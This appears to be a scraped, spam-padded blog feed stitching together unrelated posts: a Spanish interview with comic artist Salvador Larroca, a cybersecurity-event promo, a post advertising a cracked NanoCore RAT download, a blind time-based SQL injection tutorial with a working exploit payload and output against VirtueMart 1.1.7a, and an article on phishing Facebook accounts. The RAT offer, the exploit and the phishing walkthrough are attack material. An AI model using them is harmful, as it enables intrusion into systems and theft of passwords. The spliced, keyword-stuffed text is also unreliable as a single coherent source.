4/26/2020

Una Entrevista A Salvador Larroca (https://ift.tt/2VJB5ng) @SalvadorLarroca

Aún recuerdo las horas con mi vista sobre mi bloc de dibujo haciendo superhéroes. Me encantaba dibujar. Tengo tacos y tacos de folios aún guardados con garabatos que hice de pequeño y de adolescente. Cuerpos musculados, superhéroes volando, escenas de acción. Hice muchos, pero no tenía el talento necesario para dedicarme al mundo del dibujo. Lo mío iban a ser otras cosas. Los ordenadores, la tecnología. Mi "super poder", como dice Salvador Larroca, es otro.

Figura 1: Una entrevista a Salvador Larroca

Sin embargo, uno de los chavales de mi generación en España, empezaba a hacer posters, y portadas en los cómics que yo leía. Y era un chaval que se llamaba Savador Larroca, de Valencia. La admiración por sus dibujos creció durante años hasta que se convirtió en un icono en Marvel, por sus premios - ¡joder, si hasta en las películas de Los Vengadores de Marvel sale en los créditos! -.

Figura 2: Contactar con Salvador Larroca

Un día, el azar me lo trajo a la puerta de mi casa, ya que vino a Madrid, al Espacio de la Fundación Telefónica, a participar en una charla-homenaje por sus 25 años trabajando en Marvel, así que me organicé el día y le hice la envolvente para comer con él. Desde ese día nació una bonita amistad donde compartimos muchas cenas, charlas, algún podcast, abrazos y aventuras.


Figura 3: Salvador Larroca, 25 años en Marvel

Como hecho curioso, fue por culpa de haber participado en el Podcast de Elena en el país de los horrores que conocí a Dani Marco, de Despistaos, pues él estaba escuchando ese podcast en el que yo participé. Me buscó en Instagram, y resulta que había una foto suya en mi cuenta porque yo acaba de ir a verle a un concierto que dio en su tierra. Le pareció una bonita casualidad y me escribió. Y así nació mi relación de amistad con Despistaos, Daniel Marco, José Krespo, Pablo Alonso y el "pequeño gran" Lazaro.

Por supuesto, en el último concierto de Despistaos en Valencia, Salvador  Larroca fue invitado de honro allí, que estas casualidades hay que celebrarlas siempre. Como decimos en mi grupo de amigos: "Aquí se celebra todo".


Poco más puedo decir de Salvador Larroca que no os haya dicho ya, es uno de los grandes dibujantes del cómic de este país a lo largo de la historia, ha dibujado a Star Wars, Iron Man, X-Men, lo que hace que me lo encuentre en todos los rincones de mis estanterías, tengo una cuadro suyo dedicado en mi despacho en Telefónica, dibuja como los ángeles, es uno de los protas de "Superhéroes Made in Spain", es interesantisimo escucharle sus charlas de misterio, sus aventuras con los grandes de la historia de dibujo, y le quiero un montón.







A post shared by Chema Alonso (@chemaalonso) on

Así que, para que lo conozcáis uno poco mejor, le hecho una entrevista para mi blog, que ya sabéis que me gusta traer de vez en cuando una de estas de la gente que he tenido la suerte de ir conociendo a lo largo de mi vida. Vamos a ello.

Saludos Malignos!

Entrevista a Salvador Larroca


1.- La primera pregunta es para el Salvador Larroca niño, para que nos cuente…¿cuáles fueron tus primeros cómics de superhéroes y tus primeros héroes?

Pues el primero, que yo recuerde, fue uno de Iron Man contra el Mandarín, uno de esos formatos pequeños de Vértice antiguos, con portada de López Espí (al que conocí en persona muchos años después). Luego, siguieron los de Spiderman, me fascinaba Spidey y su cotidianeidad. Y su heroísmo, ¡¡cómo no!! 


Figura 6: BloodStar de Richard Corben

Luego, siguieron los X-Men de Claremont y Byrne; entonces, empecé a compaginarlos con los cómics de Toutain Editor. Los superhéroes molaban mucho, pero, ¡amigo!, lo primero que vi fue el Bloodstar, de Richard Corben, y, después, Cuestión de Tiempo, de Juan Giménez, y ya no dudé en lo que quería hacer. Lo que pasaba era que, por esos años, ser artista no era un gran futuro profesional y lo dejé un poco como actividad secundaria. Pero eso ya es otra historia.

2.- Y la segunda para el Salvador Larroca artista. De todas las obras de cómic, cuál sería la novela gráfica, o saga, o aventura, que más redonda te ha parecido entre dibujo y guion.

Yo creo que, en superhéroes, el Born Again, de Frank Miller. Me fascinó entonces la manera de narrar de Miller; también el Batman año uno que hizo el mismo Miller para DC. Otro que también me gustaba mucho era el sentido de aventura de los X-Men, de Claremont y Byrne.

Figura 7: Born Again de Frank Miller

Realmente, a mí siempre me han gustado preferentemente los cómics que tenían un arte bonito. A mí, Bloodstar, de Corben me encantó, aquello trascendía lo que era el cómic, era arte de verdad... También, me encantaba el dibujo de Moebius, pero los guiones eran demasiado raros para mi gusto y no lo redescubrí hasta algún tiempo después. 


Figura 8: Batman Año 1

La manera en que Juan Giménez coloreaba y diseñaba sus máquinas, naves y entornos, me flipaban. Yo quería hacer eso, lo tuve de maestro en la distancia durante toda mi juventud, me aprendía cada solución cada diseño... Aunque eso no era nuevo. De chaval, me veía la serie de Mazinger cada semana y me hacía planos de cada bruto mecánico y del mismo Mazinger. La ergonomía y el diseño me fascinan

3.- Ya sabes que soy muy fan tuyo y que los fans siempre buscamos los dibujos dedicados de nuestros artísticas. Los originales de las páginas de los cómics, donde se vea el lápiz, la goma de borrar y los errores corregidos, pero la verdad es que la tecnología también ha llegado al mundo del cómic y los artistas ya usáis muchas más herramientas que el lápiz y la goma de borrar. ¿Qué herramientas utiliza Salvador Larroca para hacer una página de un cómic?

Sí, tienes razón- En un principio, usaba los sistemas clásicos: papel, lápiz y rotulador. Pero enviar las páginas por Fedex ralentizaba mucho el proceso y el escaneo presenta una serie de problemas entonces. Pero, a la mitad de mi etapa en Iron Man, me pasé al digital. Mi gran amigo personal Paco Roca me explicó el manejo de Photoshop un sábado por la mañana y el lunes ya me puse a producir.

Sé que se pierde la belleza del arte original, pero el digital tiene una capacidad de modificación, composición, retoque..., por no hablar de lo rápido que se puede enviar. Y, si hay que corregir algo, es inmediato, no hay que esperar semanas a que te devuelvan de la oficina la página, es instantáneo, en 2 minutos estará corregido allí. Por supuesto, hay otros muchos programas para poder dibujar y yo diría que se han implantado muy extensamente entre los profesionales por esas ventajas que apunto. Pero no importa cuál sea, el programa no hace el trabajo, sólo es una herramienta en manos de un profesional, sólo sirve para optimizar sus esfuerzos creativos, no te hacen la página sola como alguna gente se cree.

4.- Eres un trabajador incansable, y si tuviera que destacar una característica tuya que te ha hecho triunfar, creo que sería – además de tu talento natural para el dibujo – esa capacidad de trabajo constante, de seriedad en las entregas, y de producción a ritmo durante tantos años. ¿Cómo se organiza Salvador Larroca su trabajo? 

La verdad es que creo que el secreto de mi productividad no es otro que la organización, dependiendo del ajuste de la producción que quiera tener. Si es un cómic o dos, planifico los tiempos y sé, a cada hora, cuánto porcentaje de página he de tener hecho, para poder hacer una, una y media, o dos... Muchas veces, si la producción ha de ser alta, combino una difícil con una fácil; si he de hacer sólo una, no hay problema. 

Figura 9: Original en formato digital de Salvador Larroca (solo 20 copias firmadas)

Mi horario de trabajo es siempre el mismo, en un principio: a las 9 de la mañana, me leo el guion (aunque ya lo haya leído todo de golpe cuando lo recibo), planifico la página en su composición y aspecto, delimito las viñetas que tenga que tener, y contesto el correo, y, a las 10, me pongo siempre sin falta a dibujar, hasta que acabo, sea la hora que sea, tanto si es una página, como si son dos. Eso sí, después de comer, hago una pequeña parada para una minisiesta, así estoy despejado para continuar por la tarde.

Figura 10: Spider-Man 1 de Salvador Larroca firmado digitalmente
Tengo por norma no trabajar los fines de semana, así consigo no quemarme, salvo que tenga alguna cosa mía personal y que no incluyo en el trabajo diario.

5.- Otra faceta que me encanta de ti, es que aprovechas los minutos para dedicarlos a disfrutar de tus hobbies, y te apasiona el mundo del misterio, las leyendas paranormales, y descubrir a través de fabulas y cuentos contados en la noche historias en el podcast de "Elena en el País de los Horrores" ¿cómo preparáis esos programas?

¡Ja, ja, ja!, ¡tengo algunos hobbies…! Pinto y modelo figuras de 1/6 de tamaño, pero sí, me encanta hacer radio y eso surgió de carambola. Yo era oyente de La Rosa de los Vientos, desde sus comienzos. Yo sabía que su presentador, Juan Antonio Cebrián, ya fallecido, había sido lector de cómics Marvel en su juventud y a mí se me ocurrió dibujar a algunos de los entonces componentes del programa como periodistas en la redacción del Daily Bugle (recordemos que es el periódico donde publica sus fotos Peter Parker, alias Spiderman).

Esto le hizo mucha ilusión y me llamó al programa, fue cuando conocí a todos mis actuales amigos y, desde entonces, he colaborado a temporadas, hasta que conocí a la periodista Elena Merino, con la que sintonicé prácticamente al instante. 

Figura 11: Contactar con El país de los horrores

Desde entonces, yo colaboro con ella en la confección del programa Elena en el país de los de los Horrores. de lunes a viernes, ella trabaja para mí como mi asistente y, los fines de semana o de si la radio se trata, cambiamos los papeles y ella es mi jefa, lo pasamos bomba planeando especiales y secciones.

También he colaborado con los amigos que me suelen pedir algún tipo de intervención, como la propia Rosa de los Vientos, La Escóbula de la Brújula o cualquier otro programa para el que algún amigo crea que mi participación puede ser productiva, de alguna forma.

6.- Supongo que mucho de lo que llevas dentro viene no solo de los cómics, sino de las historias que has leído desde niño. ¿Cuáles serían los tres libros que más te han impactado en tu vida?

De chaval, me gustaba Julio Verne, pero al hacerme mayor mi pasión por la lectura ha ido más hacia el ensayo. Sé que suena un poco gafapasta, pero yo soy un hombre de descubrimientos. Cayó en mis manos Cosmos, libro inspirado en la serie de televisión,de Carl Sagan y, de ahí, me pasé a Stephen Hawking. 


Figura 12: El Maestro de Esgrima de Pérez Reverte

Me leí su Historia del tiempo y me fascinó, después muchos otros han seguido. Pero novela, realmente, aunque también leo, lo hago en menor medida. Ahora estoy con El maestro de esgrima, de Pérez Reverte, regalo de una amiga muy querida.

7.- Una de las cosas que me encanta escucharte cuando las cuentas, es cómo disfrutas con tus "cenas con asesinato". Un misterio en una cena que deben resolver los comensales. Es como jugar una partida de rol mientras te comes una buena carne y se bebe vino. Si hay que elegir un formato de juego de rol, a mí me has convencido. ¿Cómo se organiza una de estas cenas?

Eso es un invento de Elena Merino, ¡jaja! Ella se ha inventado a una duquesa de la aristocracia inglesa, periodo entre guerras y, supuestamente, para celebrar los festejos que ella costea en su localidad natal, invita a su cottage particular a todas las personalidades del pueblo, ¡gente muy turbia todos ellos!


Figura 13: Elena Merino, directora del podcast "El país de los horrores"
Han de hablar de eventos y presupuestos, pero, ¡claro!, durante esa cena sombras muy oscuras lo cubrirán todo y dará paso a sucesos que no puedo narrar aquí… Antes de la partida, cada uno de los jugadores recibe privadamente en su correo una nota con las características y biografía de su personaje, se le dice quiénes son sus amigos y qué tiene en contra de los demás. Por supuesto, nada de eso se debe compartir con nadie. 

Luego, ya en la cena, la información sirve para tomar decisiones y cuidarse de algún otro que pudiese tener aviesas intenciones.... En ocasiones yo colaboro en las cenas, haciendo de un personaje muy tenebroso, cercano a la señora duquesa y que tiene una cierta tendencia a intentar administrar sus bienes… ¿Quién sabe si lo conseguirá?

8.- Otra de las cosas que envidio de tu trabajo ha sido poder conocer a muchos de los grandes artistas con los que has soñado de niño. Stan Lee, Chris Claremont, Alan Moore, Arthur Adams, John Byrne, etc.. Pero de todos ellos, ¿quién es el que una vez que lo has conocido te ha sorprendido aún más para mejor?

Difícil de decir. He de reconocer que entre ellos algún divo que otro hay, pero hice amistad cercana con Chris Claremont y con Art Adams. Con muchos otros también: Joe quesada, los hermanos Kubert, Cassaday, Jim Lee, Whilce Portaccio... Incontables, grandes cada uno en lo suyo. También he de decir que hay alguno al que admiro como artista, pero que he preferido no conocer en persona dadas las referencias cercanas que tenía. He preferido seguir admirándoles de lejos....

Pero, realmente, mi amistad con muchos artistas se debe a mis muchos años de coincidir en convenciones en USA o en Europa, incluso en China. ¡Cualquier lugar es bueno para verles!

Y si, conocí a Stan Lee y me invitó en una ocasión a una de sus galas benéficas en NY, ¡lleno de artistas y famosos! ¡Era tan gran tipo en lo particular como GRANDE parece en sus cameos de las películas!

9.- Y ahora, inevitablemente, tenerte aquí y no preguntarte por ti sería una locura. ¿Cuáles son para ti las tres mejores obras de Salvador Larroca? Las tres de las que te sientes más orgulloso y las tienes en tu estantería en un sitio muy cerquita de tu corazón. ¿Los X-Men en Valencia? ¿Iron Man y su premio? ¿Alguna aventura de Lord Darth Vader?

Mira, lo pasé muy bien en Xtreme X-Men, por lo que implicaba: tenía como guionista a Chris Claremont, del cual yo había sido lector de chaval, tambien era una colección creada para nosotros, y se me dio libertad de colocar a los X-Men donde yo quisiera, y los metí en mi ciudad, Valencia. 

Figura 14: Piden 515 € por el X-treme X-Men en Valencia de Salvador Larroca

También, lo pasé bomba en Iron Man, tan a gustoestuve que duramos setenta y pico números en la colección y me valió un premioEisner (el Oscar de los cómics). Los tomos que hice de Darth Vader tuvieron una gran acogida…

Figura 15: Las cinco pesadillas de Iron Man.¡ Imprescindible!

Todas son especiales por una cosa u otra. Con Ghost Rider la ilusión suplía cualquier carencia, en fin… Es una larga carrera plagada de grandes momentos y algunos menos buenos, claro. En cualquier caso, el cómputo final es muy positivo.

10.- Y ahora, como fan, ¿en qué proyectos está ahora mismo Salvador Larroca y dónde vamos a poder ver su arte en la actualidad? ¿En qué estás pensado? ¿Qué estás dibujando ahora?

Pues ahora mismo estoy terminando con el Dr. Doom. ¡Sí, lo sé, me he dibujado a todo bicho que lleva armadura! Después de eso, veremos qué pasa, esto del covid 19 ha trastocado todos los planes editoriales, nosotros no somos diferentes al resto del planeta, y veremos cómo evoluciona todo. En cualquier caso, en cuanto pueda contar cosas, ¡lo hare aquí encantado!

No quiero despedirme sin darte las gracias por todo lo que me aporta tu amistad y desde aquí desearte el más brillante de los futuros, que ya lo tienes. A ver si, en nuestros ratos libres nos las apañamos para, entre los dos, crear un asistente, no virtual, sino uno como la secretaria de Reed Richards, esa chica que atiende la recepción de la torre de los 4 Fantásticos y que es como tu AURA, ¡¡¡pero con cuerpo semihumano!!!

¡¡Ahí te dejo el guante!!

Related news


  1. Libros Para Aprender A Hackear
  2. Un Hacker
  3. Password Hacking

Zirikatu Tool - Fud Payload Generator Script

More information


  1. Ethical Hacking Certification
  2. Android Hacking
  3. Hacking Tor Whatsapp
  4. Hacking System
  5. Arduino Hacking
  6. Hacker Seguridad Informática
  7. Hacking Madrid
  8. Hacking Wifi Windows

4/25/2020

HaCode - FUD Backdoor Generator / Remote Administration Tool

Continue reading
  1. Hacking Web Sql Injection Pdf
  2. Bluetooth Hacking
  3. Paginas De Hacking
  4. Hacking Etico Certificacion
  5. Libros De Hacking Pdf
  6. Growth Hacking Madrid

DOWNLOAD NANOCORE RAT 1.2.2.0 CRACKED – REMOTE ADMINISTRATION TOOL

NanoCore is one of the most powerful RATs ever created. It is capable of taking complete control of a victim's machine. It allows a user to control the system with a Graphical User Interface (GUI). It has many features which allow a user to access remote computer as an administrator. Download nanocore rat 1.2.2.0 cracked version free of cost.
NanoCore's developer was arrested by FBI and pleaded guilty in 2017 for developing such a malicious privacy threat, and sentenced 33 months in prison.

FEATURES

  • Complete Stealth Remote Control
  • Recover Passwords from the Victim Device
  • Manage Networks
  • Manage Files
  • Surveillance
  • Plugins (To take it to the next level)
  • Many advanced features like SCRIPTING

DOWNLOAD NANOCORE RAT 1.2.2.0 CRACKED – REMOTE ADMINISTRATION TOOL

Continue reading


  1. Windows Hacking
  2. Hacking Quotes
  3. Penetration Testing A Hands-On Introduction To Hacking
  4. Brain Hacking
  5. Brain Hacking
  6. Bluetooth Hacking
  7. Libro Hacker
  8. Paginas De Hacking
  9. Growth Hacking Cursos
  10. El Hacker Pelicula

4/24/2020

III Encuentro Virtual De @0xWord: Formación En Ciberseguridad E IA

Hoy os traigo el III Encuentro Virtual de 0xWord que os he subido a  mi Canal Youtube. En estas reuniones a través de Internet durante esta época de confinamiento los participantes hablan de temas que tienen que ver con la especialidad de los profesionales que se juntan. En esta ocasión, el encuentro ha juntado a Amador Aparicio, Felipe Colorado, Fran Ramírez y Pablo González.

Figura 1: III Encuentro Virtual de 0xWord: Formación en Ciberseguridad e IA

Como sabéis, Pablo González ha enfocado su carrera a la ciberseguridad, especialmente en el área del Ethical Hacking, donde ha escrito muchos libros de 0xWord con esta temática, como son los libros de:


Pero también ha colaborado en otros títulos e incluso escrito una novela en la que mezclan acción y hacking como es Got Root que escribió junto a Felipe Colorado, otro de los participantes de este encuentro. Felipe, además de esa, ha publicado las novelas de Cluster y Crime Investigation, donde se narran aventuras basadas en el trabajo de los analistas forenses. Pero además tiene otras novelas más allá de 0xWord como son Baldur: El ocaso de III Reich y Om: La montaña roja.


Junto a ellos Amador Aparicio, que como sabéis es CSE (Chief Security Envoy) de ElevenPaths, Profesor de Informática en ciclos de nivel II y III donde forma a los chavales en ciberseguridad y hacking por medio de retos, y además es autor del libro de Hacking Web Technologies donde también participo yo.
Figura 3: Hacking Web Technolgies de Amador Aparicio,
Chema Alonso, Pablo González, Enrique Rando y Ricardo Martin
Y por último Fran Ramírez, que además de ser un amante de las microhistorias y aventuras de los hackers, trabaja conmigo en el equipo de Ideas Locas, y ha escrito libros sobre Docker:SecDevOps y Machine Learning aplicado a CiberSeguridad, que es una de las cosas que más le atraen. El mundo de la Inteligencia Artificial y el Hacking. Además, escribe en su blog Cyberhades.com sobre tecnología en toda su extensión.

Figura 4: III Encuentro Virtual de 0xWord con Fran Ramírez,
Pablo González, Amador Aparicio y Felipe Colorado
Todos ellos se juntaron en este III Encuentro Virtual de 0xWord para hablar de temas tan importantes como la formación en ciberseguridad, la pasión por lo que haces, como aprender hacking y el mundo de la Inteligencia Artificial. Más que recomendable para conocer sus opiniones de primera mano.


Figura 5: II Encuentro Viirtual 0xWord con Beatriz Cerrolaza, Pilar Vila y Alvaro Nuñez-Romero


Figura: 6 Encuentro Virtual de OxWord con Sergio de los Santos,
Pablo González, Fran Ramírez, Rafael Troncoso y Carlos García
Los encuentros anteriores os los dejé en otro artículo junto con la entrevista que me hicieron a mí en el podcast de "Cosas de Hackers", pero os los dejo también por aquí por si os interesa tenerlos a mano. 

Figura 7: Entrevista a Chema Alonso en "Cosas de Hackers"
por The XXLMan y José Manuel Ávalos Morer

Y para terminar, os recuerdo que durante lo que queda de mes tenéis los libros de 0xWord - incluidos los de los todos los que han participado en todos estos encuentros virtuales  - con un descuento.

Saludos Malignos!

Autor: Chema Alonso (Contactar con Chema Alonso)



Related posts

4/23/2020

Bit Banging Your Database

This post will be about stealing data from a database one bit at a time. Most of the time pulling data from a database a bit at a time would not be ideal or desirable, but in certain cases it will work just fine. For instance when dealing with a blind time based sql injection. To bring anyone who is not aware of what a "blind time based" sql injection is up to speed - this is a condition where it is possible to inject into a sql statement that is executed by the database, but the application gives no indication about the result of the query. This is normally exploited by injecting boolean statements into a query and making the database pause for a determined about of time before returning a response. Think of it as playing a game "guess who" with the database.

Now that we have the basic idea out of the way we can move onto how this is normally done and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we would first determine the length of the item, so for example an administrator's username. All examples below are being executed on an mysql database hosting a Joomla install. Since the example database is a Joomla web application database, we would want to execute a query like the following on the database:
select length(username) from jos_users where usertype = 'Super Administrator';
Because we can't return the value back directly we have to make a query like the following iteratively:

select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
We would keep incrementing the number we compare the length of the username to until the database paused (benchmark function hit). In this case it would be 5 requests until our statement was true and the benchmark was hit. 

Examples showing time difference:
 mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)
mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)
Now in the instance of the password, the field is 65 characters long, so it would require 65 requests to discover the length of the password using this same technique. This is where we get to the topic of the post, we can actually determine the length of any field in only 8 requests (up to 255). By querying the value bit by bit we can determine if a bit is set or not by using a boolean statement again. We will use the following to test each bit of our value: 

Start with checking the most significant bit and continue to the least significant bit, value is '65':
value & 128 
01000001
10000000
-----------
00000000 

value & 64
01000001
01000000
-----------
01000000
value & 32
01000001
00100000
-----------
00000000
value & 16
01000001
00010000
--------
00000000
value & 8
01000001
00001000
--------
00000000

value & 4
01000001
00000100
-----------
00000000
value & 2
01000001
00000010
-----------
00000000
value & 1
01000001
00000001
-----------
00000001
The items that have been highlighted in red identify where we would have a bit set (1), this is also the what we will use to satisfy our boolean statement to identify a 'true' statement. The following example shows the previous example being executed on the database, we identify set bits by running a benchmark to make the database pause:

mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)

mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (8.74 sec)
As you can see, whenever we satisfy the boolean statement we get a delay in our response, we can mark that bit as being set (1) and all others as being unset (0). This gives us 01000001 or 65. Now that we have figured out how long our target value is we can move onto extracting its value from the database. Normally this is done using a substring function to move through the value character by character. At each offset we would test its value against a list of characters until our boolean statement was satisfied, indicating we have found the correct character. Example of this:

select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;
This works but depending on how your character set that you are searching with is setup can effect how many requests it will take to find a character, especially when considering case sensitive values. Consider the following password hash:
da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
If you searched for this string a character at a time using the following character scheme [0-9A-Za-z] it would take about 1400 requests. If we apply our previous method of extracting a bit at a time we will only make 520 requests (65*8). The following example shows the extraction of the first character in this password:

mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.93 sec)
mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
Again I have highlighted the requests where the bit was set in red. According to these queries the value is 01100100 (100) which is equal to 'd'. The offset of the substring would be incremented and the next character would be found until we reached the length of the value that we found earlier.

Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :


          if($order_id === "" || $order_id === null)
          {
                        $vmLogger->debug("Could not find order ID via invoice");
                        $vmLogger->debug("Trying to get via TransactionID: ".$txn_id);
                       
$qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
                        $db->query($qv);
                        print($qv);
                        if( !$db->next_record()) {
                                $vmLogger->err("Error: No Records Found.");
                        }
The $txn_id variable is set by a post variable of the same name. The following example will cause the web server to delay before returning:


POST /administrator/components/com_virtuemart/notify.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#  
Now that an insertion point has been identified we can automate the extraction of the "Super Administrator" account from the system:
python vm_own.py "http://192.168.18.131/administrator/components/com_virtuemart/notify.php"
[*] Getting string length
[+] username length is:5
[+] username:admin
[*] Getting string length
[+] password length is:65
[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
The "vm_own.py" script can be downloaded here.


Related links


12 Ways To Hack Facebook Account Passwords And Its Proeven Tion Techques 2020

        12 Ways to hack facebook accounts         

"Hack Facebook" is one of the most searched and hot topics around the Internet, like Gmail hacker. We have prepared a detailed list of how hackers can hack someone's Facebook account easily in just a few minutes and how can we prevent the same.

Being a FB white hat hacker, I get following questions frequently from people:

  • Can you refer any reliable Facebook hacker? (After me denying their hacking request 😛 )
  • Is there any online FB cracker tool?
  • Where can I get FB hacking software?
  • Is there any free password finder?
  • How can I hack someone's Facebook account easily?

To the best of my knowledge, there is no hacking tool. You won't be able to find it anywhere. However, you will find many websites claiming that they are providing free hack tool (either online or offline), but you cannot download the password file without completing a survey. Even after going through a tiresome process of completing a survey, you would have got nothing in the endThese things are posted only with the intention of making money. Don't waste your precious time in searching such hack tool.


If you want to know how hackers can hack someone's FB account, please go ahead and read the techniques listed below. The most successful method among all of these techniques is phishing. Phishing enables someone with no or little technical knowledge to hack account's password easily in just a few minutes.

Some of the techniques listed below are not applicable only to FB but also to all daily used internet websites, such as Google, Twitter, Yahoo etc.

You won't be vulnerable to hacking if you understand how hacking works

This article is written with the aim of educating people about how hacking works and how should they prevent it. Please don't use these techniques for malicious purposes.

1 Phishing

Phishing is the most common technique used for hacking FB passwords. It is very easy for someone who is having little technical knowledge to get a phishing page done. That is why phishing is so popular. Many people have become a victim of Phishing page due to its trustworthy layout and appearance.

How does phishing work?

In simple words, phishing is a process of creating a duplicate copy of the reputed website's page with the intention of stealing user's password, or other sensitive information like credit card details. In our topic, it means creating a page which perfectly looks like FB login page but in a different URL like fakebook.com, or faecbook.com, or any URL that pretends to be legit. When a user lands on such a page, he/she may think that is the real Facebook login page, asking him/her to provide his/her username and password. So, the people who do not find phishing page suspicious are going to enter their username & password. The password information will be sent to the hacker who created the phishing page. At the same time, the victim gets redirected to original FB page.

 

Example: John is a programmer. He creates an FB login page with some scripts that enable him to get the username and password information. John puts this fake login page in https://www.facebouk.com/make-money-online-tricks. Peter is a friend of John. John sends a message to Peter, "Hey Peter, I have found a free trick to make money online, you should definitely take a look at https://www.facebouk.com/make-money-online-tricks-free". Peter navigates to the link and see a FB login page. As usual, Peter enters his username and password on it.

The hacking part

The username and password of Peter is sent to John and Peter is redirected to a money making tips page https://www.facebouk.com/make-money-online-tricks-tips-free.htmlThat's all; Peter's Facebook account is hacked.

Please note that phishing is done by a third person through emails; that is how it happens most of the time. So always beware of phishing emails, else you may lose your Facebook account, or credit card details, or any other sensitive data. Learn more about phishing.

How can you protect yourself against online FB phishing?

Hackers can reach you in many ways; email, personal messages, FB messages, website ads etc. Clicking any links from these messages will lead you to a FB login page. Whenever you find an FB login page, you should note only one thing which is URL. Because nobody can spoof/use Facebook URL except when there are some XSS zero-day vulnerabilities, but that's very rare.

  1. What is the URL you see in browser address bar? 
  2. Is that really https://www.facebook.com/ (Trailing slash is very important since it is the only separator in Google chrome to distinguish domain and subdomain. Check out the below examples to know the difference)? 
  3. Is there a green color secure symbol (HTTPS) provided in the address bar?

Bearing these questions in mind should prevent you from the hacking of online phishing pages. Also, see the below examples of phishing pages.

Some super perfect phishing pages

Facebook Perfect Phishing Page
Phishing Page – Note the misleading URL

Most of the people won't suspect this page (snapshot given above) since there is an https prefix with a green color secure icon and also there is no mistake in www.facebook.com. But, this is a phishing page. How? Note the URL correctly. It is https://www.facebook.com.infoknown.com. So, www.facebook.com is a sub-domain of infoknown.com. Google Chrome does not differentiate the sub-domain and domain, unlike Firefox does.

One can obtain SSL Certificates (HTTPS) from many online vendors. A few vendors give SSL Certificate for Free for 1 year. It is not a big deal for a novice to create a perfect phishing page like the one given above. So, beware of it.

Phishing Someone's Facebook Account Password
Phishing Page – Note the misleading URL.

This is a normal FB Phishing page with some modification in the word Facebook.


2 Social Engineering

This is the second most common technique for hacking Facebook accounts. In fact, this method shouldn't come under Hacking, since much knowledge is not required for this method. I am listing this method under hacking to ensure the list of most common techniques used for FB account hacking in their respective order. Social engineering is basically a process of gathering information about someone, whose account you need to hack. The information may be his/her date of birth, mobile number, boyfriend/girlfriend's mobile number, nickname, mother's name, native place etc.

How does Social Engineering work?

Security Question

Facebook-Social-Engineering-Security-Question
FB-Social-Engineering-Security-Question

Many websites have a common password reset option called Security Question. Most common security questions are :

What is your nickname?

Who is your first-grade teacher?

What is your native place?

or


Any custom questions defined by the user.

Obtaining such information from the respective people may let us hack into their account. So, if anyone comes to know the answer to it, they will be able to hack your account using forgot password option.

Most Common and Weak Passwords

Security Question does not let you get into others FB account easily. But, setting a weak password could easily allow any of your friends to hack your account.

What is a weak password? 

A password that is easily guessable by a third person is known as a weak password.

Most common passwords
  • Mobile Number
  • Nickname / Name and Date of Birth Conjunction
  • Boy Friend's Mobile Number / Girl Friend's Mobile Number – Most of the lovers 😛
  • Girl Friend's / Boy Friend's Name – Most of the lovers 😛
  • Boy or Girl Friend Name Combination
  • Bike Number
  • Unused / Old Mobile Number
  • Pet Name
  • Closest Person Name (can be friends too)

Now, be honest and comment here if you are one of the people who have any one of the common passwords mentioned above. Please don't forget to change your password before making a comment 😉

How can you protect yourself from Social Engineering? 

Security Question

Don't have a weak or familiar security question/answer. Therefore, it should be known only to you. You can set your security question here. Fortunately, Facebook has a lockout period of 24 hours before giving access to the one who successfully answered the security question, meaning that the hacker cannot enter into your account until 24 hours. So you can prevent the hacking attempt by logging in to your account in the 24 hours lockout period.

Additionally, FB provides an option called "Login Alerts" under Facebook Security Settings. You should add your mobile or email there to get notified whenever your account is logged in to a new or unknown device.

Most Common and Weak Passwords

It is very simple. Change your password now if you have any one of the weak passwords stated above.


You might also be interested in hacking facebook fan page article

